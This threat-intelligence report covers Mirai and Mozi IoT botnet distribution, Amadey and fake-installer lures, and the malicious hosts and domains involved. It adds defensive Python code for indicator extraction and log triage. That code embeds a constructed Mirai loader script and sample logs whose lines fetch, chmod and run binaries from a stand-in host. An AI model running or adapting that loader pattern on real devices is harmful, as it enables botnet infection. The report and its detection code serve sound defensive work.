On April 3, 2026, threat intelligence monitoring identified 50 malicious URLs actively distributing IoT botnet malware, most of them Mirai and Mozi variants. Activity in this period is dominated by IoT exploitation campaigns delivering payloads for several architectures (MIPS, MIPSEL, ARM, x86_64) through automated distribution infrastructure. Notably, a single host, 87.121.84.18, served multi-architecture Mirai payloads behind shell loader scripts; this is the standard Mirai recruitment pattern rather than a sign of unusual sophistication, since one first-stage script fetches every available build and lets the one matching the device's CPU run. Multiple Mozi nodes were also observed, predominantly in Asian IP ranges; because Mozi nodes serve payloads to the devices they infect, these hosts are most likely already-compromised devices, which points to ongoing peer-to-peer propagation rather than attacker-run hosting. Non-IoT activity included distribution of the Amadey loader from a compromised legitimate website and social-engineering lures packaged as fake Adobe Acrobat Reader and WordPress installers. No vulnerability newly added to the KEV or NVD feeds was tied to these campaigns during the period; the observed activity is consistent with Mirai and Mozi's usual reliance on default-credential brute force and long-known, already-patched device flaws rather than on zero-day exploitation. Absence from those feeds is not evidence that no exploitation occurred, so this inference should be treated as a working assumption to be confirmed against the exploit attempts actually logged on the targeted devices.
Multiple malware distribution URLs detected hosting Mirai and Mozi botnet variants targeting IoT devices across various architectures
Coordinated malware distribution campaign serving Mirai botnet payloads for MIPS, MIPSEL, ARMv5, ARMv7 and x86_64 via wget-based shell loader scripts (lol.sh, wget.sh). Each loader changes into a writable directory, then for every architecture build in turn downloads the binary, marks it executable, runs it and deletes it; builds for the wrong CPU simply fail to execute, so a single command injected into any compromised device yields a working bot without any fingerprinting step. Hosting the loaders alongside the architecture-specific ELF binaries on the same infrastructure indicates an active recruitment operation. For blocking and hunting, the loader URLs and the download host are the durable indicators; individual ELF hashes change with every rebuild.
29 unique IP addresses observed serving Mozi botnet payloads, predominantly MIPS and ARM builds. Geographic concentration in Asian IP ranges (China, India) is consistent with Mozi's established victim population of consumer routers and DVRs in the region. Mozi is a peer-to-peer botnet built on the BitTorrent DHT protocol: infected nodes locate one another through the DHT, and each node serves the payload from its own embedded HTTP server to the devices it goes on to compromise, so there is no central C2 or distribution server to take down. The 29 serving addresses should therefore be treated as victims rather than as attacker-controlled hosting; blocking them individually has little lasting effect, and the useful indicators are the payload file names, the high-port HTTP fetch pattern and the exploitation behaviour itself.
A Mirai payload built for 64-bit MIPS, fetched with wget: the download requests carry a Wget user-agent, consistent with a download command executed on the compromised device itself. A dedicated mips64 build extends the usual 32-bit MIPS/MIPSEL set and shows that the operator's loader covers 64-bit MIPS routers and network equipment, not only the 32-bit consumer devices that make up most Mirai infections.
Brazilian IP space hosting Mirai loader scripts and payload distribution infrastructure targeting IoT devices. Distribution hosts spread across unrelated regions indicate that the operators rent or compromise hosting wherever it is available; the country of a download server says little about who runs the botnet or where its victims are, so geographic blocking is not a useful control here.
Non-IoT malware distribution including information stealers and social engineering campaigns targeting desktop users
Amadey distributed from a compromised legitimate website (racing-shop-schuller.de), disguised as a WebRTC driver installation package. Amadey is a loader: it profiles the host, reports to its C2 and fetches follow-on payloads, which in past campaigns have included information stealers, banking trojans and ransomware. A single Amadey detection should therefore trigger a search for second-stage artefacts and C2 traffic rather than being closed as an isolated infection.
Malicious VBS script hosted on Cloudflare Pages (pages.dev) infrastructure, impersonating an Adobe Acrobat Reader patch or update. The payload behind the lure was not analysed for this report; VBS lures of this kind typically act as downloaders for a further stage or as credential-harvesting scripts. Because the script runs under wscript.exe or cscript.exe, the practical detection point is that interpreter launching from a user's download directory and making outbound connections.
Two domains (keilo-jermailer.com, mailer-kjermjs.com) distributing ZIP archives labelled 'WORDPRESS 2026'. The archive contents were not analysed for this report; given the lure, the probable payloads are webshells, PHP backdoors or credential stealers aimed at WordPress administrators and developers, but that remains a hypothesis until the archives are examined.
Multiple suspicious files (JNG1.txt, JNG2.txt, Porcate.cmd, imbosomed.deploy) hosted on a single infrastructure node. The combination of a .cmd batch launcher, .txt files that may carry encoded payloads, and an unusual .deploy extension is consistent with a multi-stage Windows loader chain, but the malware family and capabilities cannot be determined without analysing the files themselves.
Analysis of delivery mechanisms and infrastructure characteristics observed in malware distribution campaigns
Downloads across the IoT campaigns consistently carry a Wget user-agent, which means the fetch is issued from the compromised device itself: the attacker first obtains command execution, through default-credential brute force against Telnet or SSH or through a command-injection or authentication-bypass flaw in the device's management interface, and then runs a one-liner that downloads the loader script and pipes it to a shell. The shell scripts (*.sh) serve as first-stage loaders that download each architecture build, mark it executable and run it; the builds for the wrong CPU fail harmlessly, so the operator infects heterogeneous devices without a fingerprinting step. For defenders this makes the loader URL, the download host and a Wget user-agent on egress from IoT network segments more reliable indicators than any single binary hash.
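As an added example (not part of the original report), the following Python extracts the indicators a loader script of this kind exposes: the download URLs and hosts, the per-architecture binary names, the Mirai-style source tag passed as the bot's first argument, and the writable directories the script probes. The script text, the host 198.51.100.7 (a documentation address) and the file names are constructed to mirror the lol.sh/wget.sh pattern described above and are not the observed infrastructure.

```python
"""Extract indicators from a Mirai-style multi-architecture loader script.

Added example; the sample script, host and file names below are constructed
(198.51.100.7 is a documentation address) and are not the report's observed
infrastructure.
"""
import re
from collections import namedtuple

# Constructed loader mirroring the lol.sh/wget.sh pattern: probe for a writable
# directory, then for every architecture: fetch, chmod, run, delete.
SAMPLE_LOADER = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.7/bins/mirai.mips; chmod +x mirai.mips; ./mirai.mips lol.sh; rm -rf mirai.mips
wget http://198.51.100.7/bins/mirai.mpsl; chmod +x mirai.mpsl; ./mirai.mpsl lol.sh; rm -rf mirai.mpsl
wget http://198.51.100.7/bins/mirai.arm5; chmod +x mirai.arm5; ./mirai.arm5 lol.sh; rm -rf mirai.arm5
wget http://198.51.100.7/bins/mirai.arm7; chmod +x mirai.arm7; ./mirai.arm7 lol.sh; rm -rf mirai.arm7
curl -O http://198.51.100.7/bins/mirai.x86_64; chmod +x mirai.x86_64; ./mirai.x86_64 lol.sh; rm -rf mirai.x86_64
"""

Download = namedtuple("Download", "url host filename arch exec_tag")

# wget/curl invocation followed by the URL it fetches (tftp-based loaders are not handled)
URL_RE = re.compile(r'\b(?:wget|curl)\b[^\n;]*?(https?://([^/\s;"\']+)[^\s;"\']*)')
# "./binary [tag]" terminated by ";" or end of line. Mirai reads argv[1] as an
# infection-source tag, so the tag shows which loader/campaign dropped the bot.
EXEC_RE = re.compile(r"\./(\S+?)(?:\s+([^\s;]+))?\s*(?:;|$)")
# Naming conventions seen in Mirai build sets; more specific tokens come first
ARCH_PATTERNS = [
    ("mips64", re.compile(r"mips64")),
    ("mipsel", re.compile(r"mipsel|mpsl")),
    ("mips", re.compile(r"mips")),
    ("armv7", re.compile(r"armv?7")),
    ("armv6", re.compile(r"armv?6")),
    ("armv5", re.compile(r"armv?5")),
    ("arm", re.compile(r"arm")),
    ("x86_64", re.compile(r"x86_64|x64|amd64")),
    ("x86", re.compile(r"x86|i[3-6]86")),
    ("powerpc", re.compile(r"ppc|powerpc")),
    ("sh4", re.compile(r"sh4")),
    ("m68k", re.compile(r"m68k")),
    ("sparc", re.compile(r"sparc|spc")),
]


def infer_arch(filename):
    """Map a payload file name to its target architecture by naming convention."""
    name = filename.lower()
    for arch, pat in ARCH_PATTERNS:
        if pat.search(name):
            return arch
    return "unknown"


def staging_dirs(script):
    """Directories the loader tries to cd into, in order: where to look for the dropped binary."""
    seen = []
    for d in re.findall(r"\bcd\s+(/\S*)", script):
        if d not in seen:
            seen.append(d)
    return seen


def extract_downloads(script):
    """One Download per fetch line: URL, host, file name, inferred arch and exec tag."""
    found = []
    for line in script.splitlines():
        m = URL_RE.search(line)
        if not m:
            continue
        url, host = m.group(1), m.group(2)
        filename = url.rsplit("/", 1)[-1]
        e = EXEC_RE.search(line)
        tag = e.group(2) if e else None
        found.append(Download(url, host, filename, infer_arch(filename), tag))
    return found


def summarize(downloads):
    """Collapse per-line results into the indicators worth blocking or hunting for."""
    return {
        "hosts": sorted({d.host for d in downloads}),
        "urls": [d.url for d in downloads],
        "architectures": [d.arch for d in downloads],
        "exec_tags": sorted({d.exec_tag for d in downloads if d.exec_tag}),
    }


if __name__ == "__main__":
    dls = extract_downloads(SAMPLE_LOADER)
    for d in dls:
        print(f"{d.arch:8} {d.url}  tag={d.exec_tag}")
    print(summarize(dls))
    print("staging dirs:", staging_dirs(SAMPLE_LOADER))
```

Run against a captured loader, the host list and URLs feed blocklists, the architecture list tells you which device classes the operator is after, and the staging directories are where to look on a suspect device for the dropped binary or its leftover process.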
Cloudflare Pages (pages.dev) and compromised legitimate websites are used to host payloads so that URL reputation filtering sees a trusted domain or a reputable cloud provider rather than attacker infrastructure. Blocking the parent domain is rarely feasible, so detection has to rest on the object fetched (for example a .vbs or installer package served from a free-hosting subdomain) and on what executes afterwards, not on the hosting domain alone.
Mozi nodes serve payloads on randomised high ports (34068-56628 observed in this period), which defeats port-based firewall rules and blends into ordinary high-port traffic. Peer discovery over the BitTorrent DHT means there is no bootstrap server or C2 to seize, so takedowns of individual nodes have little effect on the botnet as a whole. On a suspected device, the two signs to check are an HTTP listener on a random high port bound by a process started from a temporary directory, and UDP BitTorrent DHT traffic from a device that has no reason to run a BitTorrent client.
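As an added example (not part of the original report), the following Python runs three heuristics from this section over egress HTTP logs: a Wget or curl user-agent fetching a loader script or architecture-named binary from a bare IP address, a fetch of a Mozi payload from a peer on a high port, and a script download from a Cloudflare Pages project. The log format and every sample line are constructed; the hosts come from documentation address ranges and a placeholder pages.dev project name, and the Mozi payload names Mozi.m and Mozi.a are the publicly documented ones rather than names taken from this report.

```python
"""Triage egress HTTP logs for the download patterns described in the report.

Added example, not part of the original report. The log format and every
sample line are constructed; hosts come from documentation ranges and a
placeholder pages.dev project name, not from the observed infrastructure.
"""
import re
from urllib.parse import urlsplit

# Constructed format: <ts> <src_ip> <method> <url> <status> <bytes> "<user-agent>"
SAMPLE_LOG = """\
2026-04-03T02:11:09Z 192.0.2.45 GET http://198.51.100.7/lol.sh 200 812 "Wget"
2026-04-03T02:11:10Z 192.0.2.45 GET http://198.51.100.7/bins/mirai.mips 200 61204 "Wget"
2026-04-03T02:13:51Z 192.0.2.77 GET http://203.0.113.9:45022/Mozi.m 200 139128 "Wget"
2026-04-03T02:20:00Z 192.0.2.12 GET https://cdn.example.com/jquery.min.js 200 89476 "Mozilla/5.0"
2026-04-03T02:22:31Z 192.0.2.90 GET https://example-project.pages.dev/AcrobatReader_update.vbs 200 4102 "Mozilla/5.0"
2026-04-03T02:25:14Z 192.0.2.45 GET http://203.0.113.9:80/index.html 200 1024 "Wget"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) "([^"]*)"$')
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Bare downloader user-agents: BusyBox sends "Wget", GNU wget "Wget/1.x", curl "curl/7.x"
DOWNLOADER_UA = re.compile(r"^(?:Wget|curl)\b", re.I)
# Loader scripts and the architecture suffixes Mirai build sets are usually named with
IOT_PAYLOAD = re.compile(
    r"\.(?:sh|mips|mpsl|mipsel|mips64|arm\d?|armv\d|x86(?:_64)?|i[3-6]86|ppc|sh4|m68k|spc|sparc)$",
    re.I,
)
# Publicly documented Mozi payload names, and the port range this report observed
MOZI_NAMES = {"Mozi.m", "Mozi.a"}
MOZI_PORT_RANGE = (34068, 56628)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|hta|ps1|cmd|bat)$", re.I)


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, method, url, status, size, ua = m.groups()
        yield {"ts": ts, "src": src, "method": method, "url": url,
               "status": int(status), "bytes": int(size), "ua": ua}


def classify(entry):
    """Return the names of the heuristics one entry triggers (empty list if none)."""
    u = urlsplit(entry["url"])
    host, port, basename = u.hostname or "", u.port, u.path.rsplit("/", 1)[-1]
    hits = []
    # 1. wget/curl fetching a loader script or arch-named binary from a bare IP:
    #    the command the attacker runs on the device after gaining a shell
    if DOWNLOADER_UA.match(entry["ua"]) and IPV4_HOST.match(host) and IOT_PAYLOAD.search(basename):
        hits.append("iot_loader_fetch")
    # 2. Mozi payload served by a peer; the port shows whether it sits in the observed range
    if basename in MOZI_NAMES:
        hits.append("mozi_payload_fetch")
        if port is not None and MOZI_PORT_RANGE[0] <= port <= MOZI_PORT_RANGE[1]:
            hits.append("mozi_observed_port_range")
    # 3. Script download from a Cloudflare Pages project (the Acrobat-lure pattern)
    if host.endswith(".pages.dev") and SCRIPT_EXT.search(basename):
        hits.append("pages_dev_script_download")
    return hits


def triage(log_text):
    """(src_ip, url, hits) for every line that triggers at least one heuristic."""
    alerts = []
    for e in parse(log_text):
        hits = classify(e)
        if hits:
            alerts.append((e["src"], e["url"], hits))
    return alerts


def suspect_devices(alerts):
    """Group hits by internal source address: the devices to pull for forensics."""
    by_src = {}
    for src, _url, hits in alerts:
        by_src.setdefault(src, set()).update(hits)
    return by_src


if __name__ == "__main__":
    alerts = triage(SAMPLE_LOG)
    for src, url, hits in alerts:
        print(f"{src:15} {','.join(hits):45} {url}")
    print(suspect_devices(alerts))
```

The first heuristic is deliberately narrow (bare IP host plus downloader user-agent plus a loader or architecture-style file name) so that routine package fetches do not trigger it; an appliance that legitimately pulls firmware by IP address with wget would still need an allow-list entry. The Mozi port check is a confidence booster, not a requirement, since the range is whatever was observed in this period and the nodes pick ports at random.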